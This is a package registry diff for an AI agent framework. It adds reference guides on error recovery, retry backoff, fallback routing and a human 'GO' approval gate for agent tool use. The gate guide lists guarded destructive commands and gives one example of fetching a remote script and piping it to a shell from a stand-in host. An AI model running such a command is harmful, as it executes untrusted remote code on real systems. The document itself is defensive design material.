@hybridlabor-api/aos 4.2.0-beta.0 → 4.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.agents/graph.md +3 -1
- package/.agents/nodes.json +4 -2
- package/.claude/workflows/startcycle-dispatch.mjs +18 -5
- package/.claude/workflows/teamwork-dispatch.mjs +287 -0
- package/THIRD_PARTY_NOTICES.md +50 -0
- package/docs/skills_table.md +1 -0
- package/installer.js +15 -0
- package/package.json +1 -1
- package/skills/basic/bdbmediastorm/SKILL.md +7 -5
- package/skills/basic/startcycle/SKILL.md +3 -1
- package/skills/basic/startcycle-graph/SKILL.md +18 -2
- package/skills/basic/startcycle-graph-user/SKILL.md +3 -1
- package/skills/basic/teamwork-preview/SKILL.md +209 -0
- package/skills/bdbrainstorm/SKILL.md +4 -3
- package/skills/global_config/ask-tim/SKILL.md +73 -6
- package/skills/global_config/bdbresilience/SKILL.md +216 -0
- package/skills/global_config/bdbresilience/contracts/nodes-integration.md +225 -0
- package/skills/global_config/bdbresilience/references/cicd-triage.md +179 -0
- package/skills/global_config/bdbresilience/references/distributed-locking.md +235 -0
- package/skills/global_config/bdbresilience/references/error-recovery.md +210 -0
- package/skills/global_config/bdbresilience/references/two-phase-go-gate.md +151 -0
- package/skills/global_config/domain-modeling/ADR-FORMAT.md +47 -0
- package/skills/global_config/domain-modeling/CONTEXT-FORMAT.md +60 -0
- package/skills/global_config/domain-modeling/SKILL.md +77 -0
- package/skills/global_config/grill-me/SKILL.md +14 -0
- package/skills/global_config/grill-with-docs/SKILL.md +24 -0
- package/skills/global_config/grilling/SKILL.md +42 -0
- package/skills/global_config/openwiki-skill/scripts/install_daemon.sh +55 -12
- package/.agents/skills/firecrawl/SKILL.md +0 -149
- package/.agents/skills/firecrawl/rules/install.md +0 -82
- package/.agents/skills/firecrawl/rules/security.md +0 -26
- package/.agents/skills/firecrawl-agent/SKILL.md +0 -58
- package/.agents/skills/firecrawl-build/SKILL.md +0 -39
- package/.agents/skills/firecrawl-build-interact/SKILL.md +0 -68
- package/.agents/skills/firecrawl-build-onboarding/SKILL.md +0 -103
- package/.agents/skills/firecrawl-build-onboarding/references/auth-flow.md +0 -39
- package/.agents/skills/firecrawl-build-onboarding/references/project-setup.md +0 -20
- package/.agents/skills/firecrawl-build-onboarding/references/sdk-installation.md +0 -17
- package/.agents/skills/firecrawl-build-scrape/SKILL.md +0 -69
- package/.agents/skills/firecrawl-build-search/SKILL.md +0 -69
- package/.agents/skills/firecrawl-crawl/SKILL.md +0 -59
- package/.agents/skills/firecrawl-download/SKILL.md +0 -70
- package/.agents/skills/firecrawl-interact/SKILL.md +0 -84
- package/.agents/skills/firecrawl-map/SKILL.md +0 -51
- package/.agents/skills/firecrawl-scrape/SKILL.md +0 -69
- package/.agents/skills/firecrawl-search/SKILL.md +0 -60
- package/mcps/RhinoMCP/cc-plugin/.claude/settings.json +0 -10
- package/mcps/after-effects-mcp/build/index.js +0 -840
- package/mcps/after-effects-mcp/build/scripts/applyEffect.jsx +0 -153
- package/mcps/after-effects-mcp/build/scripts/applyEffectTemplate.jsx +0 -218
- package/mcps/after-effects-mcp/build/scripts/createComposition.jsx +0 -71
- package/mcps/after-effects-mcp/build/scripts/createShapeLayer.jsx +0 -147
- package/mcps/after-effects-mcp/build/scripts/createSolidLayer.jsx +0 -114
- package/mcps/after-effects-mcp/build/scripts/createTextLayer.jsx +0 -115
- package/mcps/after-effects-mcp/build/scripts/getLayerInfo.jsx +0 -192
- package/mcps/after-effects-mcp/build/scripts/getProjectInfo.jsx +0 -90
- package/mcps/after-effects-mcp/build/scripts/listCompositions.jsx +0 -50
- package/mcps/after-effects-mcp/build/scripts/mcp-bridge-auto.jsx +0 -1773
- package/mcps/after-effects-mcp/build/scripts/setLayerProperties.jsx +0 -160
- package/mcps/bdb-remoteos-mcp/queue.db +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/__init__.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/incus_client.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/main.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/queue.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/schemas.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/server.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/src/bdb_remoteos_mcp/__pycache__/webhook.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/tests/__pycache__/__init__.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/tests/__pycache__/mock_incus.cpython-312.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/tests/__pycache__/test_mcp_server.cpython-312-pytest-9.1.1.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/tests/__pycache__/test_security_redteam.cpython-312-pytest-9.1.1.pyc +0 -0
- package/mcps/bdb-remoteos-mcp/tests/__pycache__/test_webhook.cpython-312-pytest-9.1.1.pyc +0 -0
- package/mcps/computer-use-mcp/dist/client.d.ts +0 -150
- package/mcps/computer-use-mcp/dist/client.js +0 -136
- package/mcps/computer-use-mcp/dist/entrypoint.d.ts +0 -16
- package/mcps/computer-use-mcp/dist/entrypoint.js +0 -26
- package/mcps/computer-use-mcp/dist/native.d.ts +0 -212
- package/mcps/computer-use-mcp/dist/native.js +0 -50
- package/mcps/computer-use-mcp/dist/server.d.ts +0 -32
- package/mcps/computer-use-mcp/dist/server.js +0 -342
- package/mcps/computer-use-mcp/dist/session.d.ts +0 -101
- package/mcps/computer-use-mcp/dist/session.js +0 -2372
- package/skills/bdbsaastraining/scripts/__pycache__/build_profile.cpython-314.pyc +0 -0
|
@@ -0,0 +1,210 @@
|
|
|
1
|
+
# 🔁 Reference Guide: Error Recovery & Fallback Routing
|
|
2
|
+
|
|
3
|
+
**Pattern**: Pattern 1 — Agent Runtime & Tool Fault Tolerance
|
|
4
|
+
**Module**: `bdb-cicd-resilience/recovery`
|
|
5
|
+
**Authoritative Source**: BDB Agent OS Resilience Specification
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## 1. Overview & Problem Statement
|
|
10
|
+
|
|
11
|
+
Autonomous AI agents executing complex development cycles interface with numerous external boundaries: MCP servers, remote HTTP APIs, local compilers, and subprocess tools. In unhardened architectures, transient hiccups (such as an HTTP 429 rate limit or network socket drop) cause immediate agent crashes, session restarts, or synthetic hallucinations where the agent fabricates tool responses.
|
|
12
|
+
|
|
13
|
+
The BDB Error Recovery Engine intercepts every runtime and tool failure, deterministically categorizing the error into a 4-tier taxonomy, executing exponential backoff with Full Jitter, diverting to secondary fallback tools when applicable, and escalating unrecoverable errors cleanly to human operators.
|
|
14
|
+
|
|
15
|
+
---
|
|
16
|
+
|
|
17
|
+
## 2. 4-Tier Failure Classification Taxonomy
|
|
18
|
+
|
|
19
|
+
Every caught exception is inspected against error codes, HTTP status codes, error messages, and causal chains:
|
|
20
|
+
|
|
21
|
+
```
|
|
22
|
+
[ Caught Exception / Rejection ]
|
|
23
|
+
│
|
|
24
|
+
▼
|
|
25
|
+
┌───────────────────────────────┐
|
|
26
|
+
│ classifyError() Logic │
|
|
27
|
+
└───────────────┬───────────────┘
|
|
28
|
+
│
|
|
29
|
+
┌──────────────────┬────────────┴───────────┬──────────────────┐
|
|
30
|
+
│ │ │ │
|
|
31
|
+
▼ ▼ ▼ ▼
|
|
32
|
+
┌──────────────┐ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐
|
|
33
|
+
│ TRANSIENT │ │ TOOL_FAULT │ │ AUTH │ │UNRECOVERABLE │
|
|
34
|
+
│ (429, 503, │ │ (Crash, Bad │ │ (401, 403, │ │(Loop, Context│
|
|
35
|
+
│ ETIMEDOUT, │ │ JSON, Schema│ │ Missing │ │ Exhausted, │
|
|
36
|
+
│ ECONNRESET) │ │ Mismatch) │ │ API Token) │ │ Fatal State) │
|
|
37
|
+
└──────┬───────┘ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘
|
|
38
|
+
│ │ │ │
|
|
39
|
+
▼ ▼ ▼ ▼
|
|
40
|
+
[Full Jitter [Secondary Tool [Escalate to [Fail-Closed ]
|
|
41
|
+
Retry Loop] Fallback Routing] Human Env Setup] Escalation ]
|
|
42
|
+
```
|
|
43
|
+
|
|
44
|
+
### Classification Matrix
|
|
45
|
+
|
|
46
|
+
The checks run **in this order**, and the first match wins. The order is load-bearing: `ECONNREFUSED` is classified `transient`, not `tool_level_fault`, because the transient check is reached first.
|
|
47
|
+
|
|
48
|
+
| # | Category | Actual signatures in `classifyError` | Can Retry? | Suggested Action | Handling Strategy |
|
|
49
|
+
|---|----------|-------------------|------------|------------------|-------------------|
|
|
50
|
+
| 1 | **`unrecoverable`** | loop phrases (`loop detected`, `no progress loop detected`, `identical reviewer finding ids`, `max iterations reached`, `infinite loop`); context exhaustion (`context overflow`, `context exhaustion`, `prompt length exceeds`); fatal state (`critical_fatal`, `corrupted state tree`, `fatal syntax in production`); a `SyntaxError` that is **not** about JSON | `false` | `escalate_to_human` | Immediate fail-closed escalation with full diagnostic payload. |
|
|
51
|
+
| 2 | **`auth_credential`** | HTTP `401`/`403`; codes `EAUTH`, `UNAUTHORIZED`, `FORBIDDEN`, `AUTH_FAILED`; messages `unauthorized`, `forbidden`, `invalid token`, `invalid_token`, `missing api key`, `bad credentials`, `authentication failed` | `false` | `escalate_to_human` | Halt immediately. Do not retry credentials, and do not divert to another provider. |
|
|
52
|
+
| 3 | **`transient`** | HTTP `429`/`502`/`503`/`504`; codes `ETIMEDOUT`, `ECONNRESET`, `ECONNREFUSED`, `EAI_AGAIN`, `ENOTFOUND`, `LOCK_TIMEOUT`, `TIMEOUT`, `ESOCKETTIMEDOUT`; messages `rate limit`, `too many requests`, `timed out`, `connection reset`, `network error`, `bad gateway`, `service unavailable`, `lock acquisition timed out` | `true` | `backoff_retry` | Full Jitter backoff up to `maxRetries`; a `Retry-After` sets the floor. |
|
|
53
|
+
| 4 | **`tool_level_fault`** | MCP/tool crash, non-zero exit, schema argument mismatch, malformed JSON output | `true`, unless `context.hasFallback === false` | `fallback_route` (or `escalate_to_human` with no fallback) | Route to the registered secondary provider. |
|
|
54
|
+
| 5 | **anything unrecognised** | terminal fall-through | `true` (fails open) | `fallback_route` | See §7 — this default is the opposite of the triage classifier's, deliberately. |
|
|
55
|
+
|
|
56
|
+
`EACCES` is **not** an auth signature here despite being a permission error; unless its message matches one of the phrases above it falls through to row 5. `ENOENT` is not a signature at any row.
|
|
57
|
+
|
|
58
|
+
---
|
|
59
|
+
|
|
60
|
+
## 3. Full Jitter Exponential Backoff Algorithm
|
|
61
|
+
|
|
62
|
+
Fixed delay retries and naive exponential backoffs create the **thundering herd problem**, where multiple concurrent agents or threads retry against a recovering service simultaneously, re-saturating the endpoint.
|
|
63
|
+
|
|
64
|
+
### Mathematical Formulation
|
|
65
|
+
The BDB Engine implements AWS-standard **Full Jitter**:
|
|
66
|
+
|
|
67
|
+
$$T_{\text{wait}} = \text{random}(0, \, \min(T_{\max}, \, T_{\text{base}} \cdot 2^{\text{attempt}}))$$
|
|
68
|
+
|
|
69
|
+
Where:
|
|
70
|
+
- $T_{\text{base}}$: Base initial backoff duration (`baseDelayMs`, **default `100 ms`**)
|
|
71
|
+
- $T_{\max}$: Ceiling duration cap (`maxDelayMs`, default `10,000 ms`)
|
|
72
|
+
- $\text{attempt}$: Zero-indexed retry attempt count ($0, 1, 2, \dots$)
|
|
73
|
+
- $\text{random}(0, X)$: Uniformly distributed pseudo-random value in $[0, X)$, floored to an integer
|
|
74
|
+
|
|
75
|
+
Three behaviours of `calculateBackoff` that the formula does not show:
|
|
76
|
+
- It returns **`-1`** once `attempt >= maxRetries` (default `3`) — a termination signal, not a delay. With the defaults, only attempts 0, 1 and 2 produce a wait.
|
|
77
|
+
- `jitter: false` disables the randomisation and returns the clamped exponential window directly.
|
|
78
|
+
- A parsed `Retry-After` acts as a **floor**, not a replacement: `delay = max(jitteredDelay, retryAfterMs)`. Per RFC 9110 a numeric `Retry-After` is delta-seconds unconditionally — there is no magnitude at which it becomes milliseconds — and the parsed value is clamped to `86,400,000 ms` so a broken or hostile server cannot pin a CI job indefinitely.
|
|
79
|
+
|
|
80
|
+
### Concrete Progression Example, with $T_{\text{base}}$ set explicitly to $500\text{ ms}$, $T_{\max} = 10,000\text{ ms}$
|
|
81
|
+
|
|
82
|
+
| Attempt | Exponential Window ($T_{\text{base}} \cdot 2^{\text{attempt}}$) | Clamped Ceiling | Jitter Range | Expected Average Wait |
|
|
83
|
+
|:-------:|:---------------------------------------------------------------:|:---------------:|:------------:|:---------------------:|
|
|
84
|
+
| 0 | $500 \cdot 2^0 = 500\text{ ms}$ | $500\text{ ms}$ | $0\text{ to }500\text{ ms}$ | $250\text{ ms}$ |
|
|
85
|
+
| 1 | $500 \cdot 2^1 = 1,000\text{ ms}$ | $1,000\text{ ms}$ | $0\text{ to }1,000\text{ ms}$ | $500\text{ ms}$ |
|
|
86
|
+
| 2 | $500 \cdot 2^2 = 2,000\text{ ms}$ | $2,000\text{ ms}$ | $0\text{ to }2,000\text{ ms}$ | $1,000\text{ ms}$ |
|
|
87
|
+
| 3 | $500 \cdot 2^3 = 4,000\text{ ms}$ | $4,000\text{ ms}$ | $0\text{ to }4,000\text{ ms}$ | $2,000\text{ ms}$ |
|
|
88
|
+
| 4 | $500 \cdot 2^4 = 8,000\text{ ms}$ | $8,000\text{ ms}$ | $0\text{ to }8,000\text{ ms}$ | $4,000\text{ ms}$ |
|
|
89
|
+
| 5+ | $500 \cdot 2^5 = 16,000\text{ ms}$ | $10,000\text{ ms}$ (Capped) | $0\text{ to }10,000\text{ ms}$ | $5,000\text{ ms}$ |
|
|
90
|
+
|
|
91
|
+
The table shows the clamping arithmetic only. With the default `maxRetries: 3`, attempts 3 and above never reach it — they return `-1`. The exponent is additionally capped at $2^{30}$ so a large attempt number cannot overflow to `Infinity`.
|
|
92
|
+
|
|
93
|
+
---
|
|
94
|
+
|
|
95
|
+
## 4. Secondary Tool Fallback Routing
|
|
96
|
+
|
|
97
|
+
When a primary tool experiences a `tool_level_fault` (e.g. MCP bridge disconnect, malformed response payload), the recovery engine routes execution to a secondary fallback provider without interrupting the agent workflow.
|
|
98
|
+
|
|
99
|
+
### Architecture
|
|
100
|
+
1. **Fallback Registry** (`ToolRouter`): Maps primary tool identifiers to registered fallback tool **names** (strings, not functions).
|
|
101
|
+
- Example: `mcp_git_commit` → `cli_git_commit`
|
|
102
|
+
- Example: `mcp_file_search` → `find_by_name`
|
|
103
|
+
2. **Execution Diversion**: `executeWithFallback` calls your `execute(toolName)` a second time with the fallback name. The caller owns the dispatch; the router only decides *whether* and *to what*.
|
|
104
|
+
3. **Audit Logging**: Every decision is appended to a JSONL audit file — `auditFilePath` if supplied, otherwise `diversions.jsonl` in the process working directory.
|
|
105
|
+
|
|
106
|
+
### The classification is a safety signal, not a log label
|
|
107
|
+
|
|
108
|
+
`executeWithFallback` refuses to divert when `classifyError` returns `canRetry: false`. An `auth_credential` rejection must not be re-sent to a second provider — that is a data-egress decision — and an `unrecoverable` fault will fail there too. The suppression is still audited (`status: "escalated"`) and the **primary** error is rethrown. With no fallback registered at all, the primary error is rethrown without an audit entry.
|
|
109
|
+
|
|
110
|
+
### Diversion Record Schema
|
|
111
|
+
Fields are exactly `DiversionRecord`. There is no `success` or `durationMs` field; the outcome is carried by `status`.
|
|
112
|
+
```json
|
|
113
|
+
{
|
|
114
|
+
"timestamp": "2026-09-05T14:40:00.123Z",
|
|
115
|
+
"originalTool": "mcp_aftereffects_applyEffect",
|
|
116
|
+
"fallbackTool": "cli_ae_script_runner",
|
|
117
|
+
"errorCategory": "tool_level_fault",
|
|
118
|
+
"reason": "Connection reset on MCP socket port 9080",
|
|
119
|
+
"status": "diverted"
|
|
120
|
+
}
|
|
121
|
+
```
|
|
122
|
+
`status` is one of `diverted` (fallback succeeded), `exhausted` (both failed — the **fallback** error is rethrown), or `escalated` (diversion suppressed by `canRetry: false`). `eventId`, `agentId` and `attempt` are optional and only written when supplied.
|
|
123
|
+
|
|
124
|
+
---
|
|
125
|
+
|
|
126
|
+
## 5. Anti-Hallucination Escalation Protocol
|
|
127
|
+
|
|
128
|
+
### The Zero-Hallucination Mandate
|
|
129
|
+
When retries are exhausted or when an error is classified as `unrecoverable` or `auth_credential`, the system must **NEVER**:
|
|
130
|
+
- Fabricate synthetic data to "keep going".
|
|
131
|
+
- Invent simulated success responses from tools.
|
|
132
|
+
- Pretend an API call succeeded when it returned an error.
|
|
133
|
+
|
|
134
|
+
### Structured Escalation Payload
|
|
135
|
+
`escalateToHuman(error, context)` **returns** this payload. It does not write it anywhere — persisting it to `production_artifacts/state.json` is the caller's job. The shape is exactly `EscalationPayload`:
|
|
136
|
+
|
|
137
|
+
```json
|
|
138
|
+
{
|
|
139
|
+
"escalationType": "HUMAN_REVIEW_REQUIRED",
|
|
140
|
+
"phase": "escalated",
|
|
141
|
+
"needs_human": true,
|
|
142
|
+
"timestamp": "2026-09-05T14:52:11.004Z",
|
|
143
|
+
"classification": "unrecoverable",
|
|
144
|
+
"primaryFailure": {
|
|
145
|
+
"tool": "fetch_database_schema",
|
|
146
|
+
"errorCode": "ECONNREFUSED",
|
|
147
|
+
"message": "Connection refused at 10.0.0.4:5432",
|
|
148
|
+
"attempts": 4
|
|
149
|
+
},
|
|
150
|
+
"impactedResource": "production_artifacts/state.json",
|
|
151
|
+
"remediationOptions": [
|
|
152
|
+
"Inspect the raw stack trace and correct syntax or semantic errors in source code.",
|
|
153
|
+
"Verify database schema definitions and migration scripts.",
|
|
154
|
+
"Revert recent uncommitted modifications to restore known-healthy state."
|
|
155
|
+
],
|
|
156
|
+
"antiHallucinationAssertion": "Fail-closed verification: No synthetic or hallucinated remediation applied. Execution halted awaiting explicit human review and authorization."
|
|
157
|
+
}
|
|
158
|
+
```
|
|
159
|
+
|
|
160
|
+
`remediationOptions` is a fixed list selected by `classification` (with two message-keyword special cases for loop and context/token exhaustion) — it is a checklist, not a diagnosis of this specific failure. `tool` is read from `context.tool` or `context.originalTool`, `attempts` from `context.attempts` (default `1`), `impactedResource` from `context.impactedResource` or `context.resource`; `fallbacksAttempted` and `impactedResource` are omitted entirely when absent. `createEscalationPayload` is an alias for the same function.
|
|
161
|
+
|
|
162
|
+
---
|
|
163
|
+
|
|
164
|
+
## 6. TypeScript Implementation Example
|
|
165
|
+
|
|
166
|
+
```typescript
|
|
167
|
+
import {
|
|
168
|
+
classifyError,
|
|
169
|
+
calculateBackoff,
|
|
170
|
+
withRetry,
|
|
171
|
+
ToolRouter
|
|
172
|
+
} from 'bdb-cicd-resilience/recovery/index.js';
|
|
173
|
+
|
|
174
|
+
// Setup the fallback registry: primary tool name -> fallback tool NAME
|
|
175
|
+
const router = new ToolRouter({ auditFilePath: 'production_artifacts/diversions.jsonl' });
|
|
176
|
+
router.registerFallback('mcp_fetch', 'cli_fetch');
|
|
177
|
+
|
|
178
|
+
async function callResilientTool(toolName: string, args: Record<string, unknown>) {
|
|
179
|
+
return await withRetry(
|
|
180
|
+
// router.execute passes the tool name to invoke; on a retryable primary
|
|
181
|
+
// failure it calls the same function again with the fallback name.
|
|
182
|
+
() => router.execute(toolName, (name) => invokeTool(name, args)),
|
|
183
|
+
{ maxRetries: 3, baseDelayMs: 500, maxDelayMs: 10000 }
|
|
184
|
+
);
|
|
185
|
+
}
|
|
186
|
+
```
|
|
187
|
+
|
|
188
|
+
`withRetry` classifies each caught error itself and rethrows immediately on `canRetry: false`, so an auth failure is not retried three times before escalating. `calculateBackoff(attempt, options, retryAfterMs?)` is exported separately for callers driving their own loop, and `BackoffEngine` wraps it with fixed options.
|
|
189
|
+
|
|
190
|
+
---
|
|
191
|
+
|
|
192
|
+
## 7. Opposite unknown-error defaults, and why they stay opposite
|
|
193
|
+
|
|
194
|
+
`recovery/classifier.ts` and `triage/classifier.ts` both have a terminal fall-through for input they do not recognise, and the two point in **opposite directions**. This is deliberate, and changing either to match the other makes one of the two modules worse.
|
|
195
|
+
|
|
196
|
+
| | `classifyError` (recovery) | `classifyDiagnostic` (triage) |
|
|
197
|
+
|---|---|---|
|
|
198
|
+
| Input | a live operational error from one in-flight call | a finished test or build log |
|
|
199
|
+
| Unknown default | `tool_level_fault`, `canRetry: true` — **fails open** | `deterministic_code_regression`, `canAutoRetry: false` — **fails closed** |
|
|
200
|
+
| Cost of being wrong | one extra bounded attempt | an unbounded CI loop re-running the pipeline against a real regression |
|
|
201
|
+
|
|
202
|
+
**The retry budget is what makes the difference.** The recovery path has one — `withRetry`'s `maxRetries`, the router's single fallback hop — so an extra attempt is bounded and usually succeeds; failing closed there would page a human for every unrecognised transient. The triage path has no budget at all: a wrong "retryable" on a deterministic regression loops forever, while failing closed costs one human look. Consistently: when `context.hasFallback === false` the recovery path has no budget left either, and it escalates too.
|
|
203
|
+
|
|
204
|
+
---
|
|
205
|
+
|
|
206
|
+
## 8. Constraint: retries assume idempotency
|
|
207
|
+
|
|
208
|
+
`withRetry` and `executeWithFallback` re-execute the operation you hand them. **They are safe only around idempotent operations.** A retried non-idempotent call — posting a PR comment, dispatching a workflow, triggering a deployment — can take effect more than once, and a diversion to a second provider can take effect on *both*. Nothing in this library detects or prevents that.
|
|
209
|
+
|
|
210
|
+
No `idempotent` flag is offered, deliberately: with no real call sites it would be set to `true` by everyone by default and would document nothing. The real design belongs where the CI call sites exist, in the AOS integration cycle. Until then, the constraint is the caller's to honour.
|
|
@@ -0,0 +1,151 @@
|
|
|
1
|
+
# 🚦 Reference Guide: Two-Phase Pre-Tool GO Gate Protocol
|
|
2
|
+
|
|
3
|
+
**Pattern**: Pattern 4 — Pre-Tool Safety Interlock & Human Authorization
|
|
4
|
+
**Module**: `bdb-cicd-resilience/triage` (`gate.ts`)
|
|
5
|
+
**Authoritative Source**: BDB Agent OS Safety Specification & `~/.claude/hooks/go-gate.mjs`
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## 1. Overview & Problem Statement
|
|
10
|
+
|
|
11
|
+
Autonomous agents possessing terminal and filesystem capabilities can execute irreversible, high-consequence operations (e.g. `git push origin main`, `npm publish`, `rm -rf /`, or modifying production databases). In unhardened setups, agents may misinterpret ambiguous conversational cues (such as *"looks good, start updating"* or *"proceed"*) as blanket authorization for destructive actions.
|
|
12
|
+
|
|
13
|
+
The BDB Two-Phase GO Gate is an absolute safety guardrail that programmatically enforces a strict separation between **Planning** and **Execution**, requiring an explicit, unadulterated human approval token—the literal single word `"GO"`—before unlocking guarded operations.
|
|
14
|
+
|
|
15
|
+
---
|
|
16
|
+
|
|
17
|
+
## 2. Two-Phase Lifecycle & Gate States
|
|
18
|
+
|
|
19
|
+
```
|
|
20
|
+
[ User Request / Plan / Audit / Cycle Start ]
|
|
21
|
+
│
|
|
22
|
+
▼
|
|
23
|
+
┌───────────────────────────┐
|
|
24
|
+
│ Phase 1: Planning Mode │ ◀── STRICT READ-ONLY MODE
|
|
25
|
+
│ (Analysis, Specs, Probes, │ Allowed: view_file, grep_search,
|
|
26
|
+
│ Typechecks, Test Runs) │ tsc --noEmit, read-only commands
|
|
27
|
+
└─────────────┬─────────────┘
|
|
28
|
+
│ Plan Complete / Quality Gate Passed
|
|
29
|
+
▼
|
|
30
|
+
┌───────────────────────────┐
|
|
31
|
+
│ Human Approval Gate │ ◀── Prompt: "Antworte mit GO..."
|
|
32
|
+
└─────────────┬─────────────┘
|
|
33
|
+
│
|
|
34
|
+
┌──────────────┴──────────────┐
|
|
35
|
+
│ Transcript Scanner Analysis │
|
|
36
|
+
└──────────────┬──────────────┘
|
|
37
|
+
│
|
|
38
|
+
┌─────────────────────────┴─────────────────────────┐
|
|
39
|
+
▼ ▼
|
|
40
|
+
[ Last Human Msg != "GO" ] [ Last Human Msg == "GO" ]
|
|
41
|
+
│ │
|
|
42
|
+
▼ ▼
|
|
43
|
+
[ GATE CLOSED ] [ GATE OPEN ]
|
|
44
|
+
- Execution Blocked - Guarded Tools Unlocked
|
|
45
|
+
- Exit Code 2 (caller's) - Caller appends its own
|
|
46
|
+
- Zero Mutating Actions state.approvals entry (§5)
|
|
47
|
+
```
|
|
48
|
+
|
|
49
|
+
---
|
|
50
|
+
|
|
51
|
+
## 3. Guarded Operations & Hook Interception
|
|
52
|
+
|
|
53
|
+
The gate operates as a `PreToolUse` hook (implemented via `~/.claude/hooks/go-gate.mjs` and `isGuardedCommand` / `verifyGoGate` in TypeScript). `isGuardedCommand` is **an allowlist, not a blocklist**, and it is evaluated in a fixed order. Only step 3 can ever return "not guarded".
|
|
54
|
+
|
|
55
|
+
**1. Unconditional guard set, matched against the raw string, before any exemption is reachable.** These are not anchored to the start of the command, so a chained command is caught wherever the dangerous part sits:
|
|
56
|
+
|
|
57
|
+
- **Remote Push**: `/\bgit\s+push\b/i`
|
|
58
|
+
- **Package Publishing**: `/\bnpm\s+publish\b/i`, `/\byarn\s+publish\b/i`, `/\bpnpm\s+publish\b/i`
|
|
59
|
+
- **Commit**: `/\bgit\s+commit\b/i`
|
|
60
|
+
- **Deployment / release**: `/\bdeploy\b/i`, `/\brelease\b/i`
|
|
61
|
+
- **Recursive Deletion**: `/\brm\s+-rf\b/i`
|
|
62
|
+
- **Indirection and metacharacter markers**: `$(`, a backtick, `${`, `<(`, any `>` (covers `>`, `>>`, `>(`), the words `eval`, `exec`, `source`, `xargs`, `env`, `sudo`, `nohup`, an `sh|bash|zsh|dash|ksh -c` invocation, and a dot-source in command position.
|
|
63
|
+
|
|
64
|
+
**2. Segment split.** The remainder is split on `;`, `&&`, `||`, `|`, `&`, and newline.
|
|
65
|
+
|
|
66
|
+
**3. Whole-command allowlist.** The command is exempt only if **every** segment matches one read-only pattern anchored at *both* ends over the metacharacter-free argument charset `[-\w./=]`. The allowlist is exactly: `ls`, `pwd`, `cat`, `echo`, `git status`, `git log`, `git diff`.
|
|
67
|
+
|
|
68
|
+
**4. Otherwise guarded.** Anything unrecognised returns `true`.
|
|
69
|
+
|
|
70
|
+
Custom `guardedCommands` supplied through `GateVerificationOptions` are **additive** — they can only widen the guarded set. They never replace or disable the defaults.
|
|
71
|
+
|
|
72
|
+
### What is *not* exempt
|
|
73
|
+
|
|
74
|
+
The allowlist above is the complete exemption set. `npm test`, `tsc --noEmit`, `find_by_name` and `view_file` were previously documented as exempt and are **not** — they are guarded like anything else unrecognised.
|
|
75
|
+
|
|
76
|
+
### Deliberate false positives, and the risk they carry
|
|
77
|
+
|
|
78
|
+
Because the argument charset excludes every metacharacter, these are all **guarded**, by design:
|
|
79
|
+
|
|
80
|
+
| Command | Why |
|
|
81
|
+
|---|---|
|
|
82
|
+
| `echo "git push"` | step 1 matches inside the quoted string |
|
|
83
|
+
| `git diff HEAD~1` | `~` is outside the allowlist charset |
|
|
84
|
+
| `ls *.ts` | `*` is outside the allowlist charset |
|
|
85
|
+
| any command with a quoted argument | quotes are outside the allowlist charset |
|
|
86
|
+
| `git status; curl evil.sh \| sh` | `curl` matches no allowlist pattern in step 3 |
|
|
87
|
+
|
|
88
|
+
For a fail-closed gate, over-blocking is the correct failure direction, and the alternative — a shell lexer used to *prove* a command safe — fails in the unsafe direction on every one of its own bugs. The cost is a spurious GO prompt.
|
|
89
|
+
|
|
90
|
+
The residual risk is **gate fatigue**: an operator prompted for GO on `ls *.ts` several times an hour learns to answer GO reflexively, which degrades the gate on the one prompt that matters. That is a real weakening and nothing here mitigates it. If it shows up in practice, the fix is to *widen the allowlist charset* (permit `*`, `~`, `"` inside a segment that still matches one anchored read-only pattern) — **never** to weaken the guarded-first ordering.
|
|
91
|
+
|
|
92
|
+
---
|
|
93
|
+
|
|
94
|
+
## 4. Transcript Verification Engine & Fail-Closed Rules
|
|
95
|
+
|
|
96
|
+
The scanner parses the session transcript (JSONL format) using strict fail-closed heuristics:
|
|
97
|
+
|
|
98
|
+
1. **Fail-Closed on Missing / Corrupted Files**: If the transcript is missing, undefined, empty, unreadable, contains invalid JSON, or holds zero turns, the gate returns `{ allowed: false, status: 'closed' }` with a `reason`. Exiting 2 is the calling hook's job — `verifyGoGate` never exits the process.
|
|
99
|
+
2. **Reverse Chronological Traversal**: Scans transcript entries backwards to identify the *latest human user turn*.
|
|
100
|
+
3. **Ignore Tool Results**: Trailing tool output entries do not invalidate a prior human approval turn.
|
|
101
|
+
4. **Ignore Automated Subagents (`isSidechain: true`)**: Sidechain subagent messages cannot approve gated operations. Only top-level human user messages are evaluated.
|
|
102
|
+
5. **Exact Literal Token Matching**:
|
|
103
|
+
- The user message is trimmed and compared case-insensitively: `msg.trim().toUpperCase() === "GO"`.
|
|
104
|
+
- Compound strings are strictly rejected:
|
|
105
|
+
- ❌ `"starte jetzt GO"` → **REJECTED**
|
|
106
|
+
- ❌ `"GO ahead and release"` → **REJECTED**
|
|
107
|
+
- ❌ `"loslegen GO"` → **REJECTED**
|
|
108
|
+
- ✅ `"GO"` → **APPROVED**
|
|
109
|
+
- ✅ `"go"` → **APPROVED**
|
|
110
|
+
|
|
111
|
+
---
|
|
112
|
+
|
|
113
|
+
## 5. `state.approvals` Audit Ledger — caller's responsibility
|
|
114
|
+
|
|
115
|
+
